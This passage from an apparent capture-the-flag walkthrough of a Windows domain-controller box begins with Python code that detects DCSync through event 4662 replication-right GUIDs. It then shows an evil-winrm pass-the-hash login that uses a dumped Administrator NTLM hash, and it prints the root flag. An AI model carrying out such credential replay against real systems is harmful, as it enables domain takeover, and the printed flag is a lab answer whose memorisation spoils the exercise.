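"""
import re
from collections import defaultdict

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100                      # AccessMask bit for control-access (extended) rights
ALLOWED_REPLICATORS = {"dc$"}               # constructed allow-list: this box's only DC is DC$
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
DOMAIN_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"   # domainDNS object class GUID

# 4662 Properties look like "%%7688\n\t{<right GUID>}\n\t{<class GUID>}"; %%7688 = Control Access.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "ethan", "SubjectDomainName": "ADMINISTRATOR",
     "AccessMask": "0x100",
     "Properties": f"%%7688\n\t{{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}}\n\t{{{DOMAIN_CLASS}}}"},
    {"EventID": 4662, "SubjectUserName": "ethan", "SubjectDomainName": "ADMINISTRATOR",
     "AccessMask": "0x100",
     "Properties": f"%%7688\n\t{{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}}\n\t{{{DOMAIN_CLASS}}}"},
    # Benign: the DC's own machine account replicating.
    {"EventID": 4662, "SubjectUserName": "DC$", "SubjectDomainName": "ADMINISTRATOR",
     "AccessMask": "0x100",
     "Properties": f"%%7688\n\t{{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}}\n\t{{{DOMAIN_CLASS}}}"},
    # Benign: a Write Property (%%7685) on an ordinary attribute, no replication GUID.
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectDomainName": "ADMINISTRATOR",
     "AccessMask": "0x20",
     "Properties": f"%%7685\n\t{{bf9679c0-0de6-11d0-a285-00aa003049e2}}\n\t{{{DOMAIN_CLASS}}}"},
]

def replication_rights(ev):
    """Names of the replication control-access rights present in a 4662 Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
    return sorted(REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS)

def detect_dcsync(events, allowed=ALLOWED_REPLICATORS):
    """Return (severity, subject, rights) for every replication request by a non-DC subject."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or not int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
            continue
        rights = replication_rights(ev)
        subject = ev["SubjectUserName"].lower()
        if not rights or subject in allowed:
            continue
        # Get-Changes-All is the right that actually yields password hashes.
        severity = "critical" if "DS-Replication-Get-Changes-All" in rights else "high"
        alerts.append((severity, f"{ev['SubjectDomainName']}\\{subject}", rights))
    return alerts

def summarize(alerts):
    """Collapse the one-event-per-right stream into subject -> set of rights."""
    summary = defaultdict(set)
    for _, subject, rights in alerts:
        summary[subject].update(rights)
    return dict(summary)
```

The same replication can also be spotted on the wire as DRSUAPI (DsGetNCChanges) traffic to port 135/dynamic RPC from an address that is not a domain controller; the secretsdump run above came from the attacker's host, not from DC.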

We now have the Administrator NTLM hash; log in with evil-winrm by passing the hash:

┌──(root㉿kali)-[/home/kali/Desktop/secretsdump.py-main]
└─# evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator

Logged in as administrator. Switch to the Desktop directory and find root.txt.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         12/7/2024  12:20 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
733c7927dc034b6e5562e66f7c8b39e5

http://www.kler.cn/a/524864.html
